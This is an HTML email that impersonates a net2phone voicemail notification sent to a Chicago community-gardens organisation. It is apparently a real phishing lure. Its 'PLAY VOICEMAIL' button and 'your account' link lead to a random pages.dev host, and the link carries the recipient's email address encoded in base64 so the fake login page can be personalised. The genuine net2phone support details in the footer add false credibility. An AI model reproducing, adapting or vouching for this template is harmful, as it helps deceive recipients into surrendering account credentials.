<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Voicemail Notification</title>
<style>
body {
background-color: #333;
color: white;
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
}
.header {
background-color: #007bff;
padding: 10px 0;
text-align: center;
}
.header h1 {
color: white;
margin: 0;
}
.header h1 span {
color: red;
}
.main {
padding: 20px;
text-align: center;
}
.details p {
margin: 10px 0;
}
.play-button {
background-color: #007bff;
color: white;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
text-decoration: none;
display: inline-block;
}
.footer {
margin-top: 20px;
padding: 10px 0;
border-top: 1px solid #555;
text-align: center;
}
.footer h3 {
color: #007bff;
margin: 10px 0;
}
.footer p {
margin: 5px 0;
}
a {
color: #007bff;
text-decoration: none;
}
</style>
</head>
<body style="background-color: #333;
color: white;
font-family: Arial, sans-serif;
margin: 0;
padding: 0">
<div style="background-color: #007bff;
padding: 10px 0;
text-align: center" class="header">
<h1 style="color: white;
margin: 0">net<span style="color: red; color: red;">2</span>phone</h1>
</div>
<div style="padding: 20px;
text-align: center" class="main">
<h2>You’ve got a new voicemail </h2>
<div class="details">
<p style="margin: 10px 0"><strong>From:WIRELESS CALLER </strong>18835282 </li>
<p><strong>To:Chicagocommunitygardens
<p><strong>Received on:</strong>6/5/2025 1:19:53 PM</li>
</div>
<a style="color: #007bff;
text-decoration: none; background-color: #007bff;
color: white;
padding: 10px 20px;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
text-decoration: none;
display: inline-block" href="https://osdiomxlqc.pages.dev/lr1mveyn?p53t5wgqug=Y29tbXVuaWNhdGlvbnNAY2hpY2Fnb2NvbW11bml0eWdhcmRlbnMub3Jn" class="play-button">PLAY VOICEMAIL</a>
<p>To delete this voicemail open it on <a style="color: #007bff;
text-decoration: none" href="https://osdiomxlqc.pages.dev/lr1mveyn?p53t5wgqug=Y29tbXVuaWNhdGlvbnNAY2hpY2Fnb2NvbW11bml0eWdhcmRlbnMub3Jn">your account</a></p>
</div>
<div style="margin-top: 20px;
padding: 10px 0;
border-top: 1px solid #555;
text-align: center" class="footer">
<h3 style="color: #007bff;
margin: 10px 0">Need Help?</h3>
<p style="margin: 5px 0">Email: <a style="color: #007bff;
text-decoration: none" href="mailto:support@net2phone.com">support@net2phone.com</a></p>
<p style="margin: 5px 0">Phone: 1(866)-978-8260 Option 2</p>
<p style="margin: 5px 0">Address: net2phone, 520 Broad Street, Newark, NJ 07102, USA</p>
</div>
</body>
</html>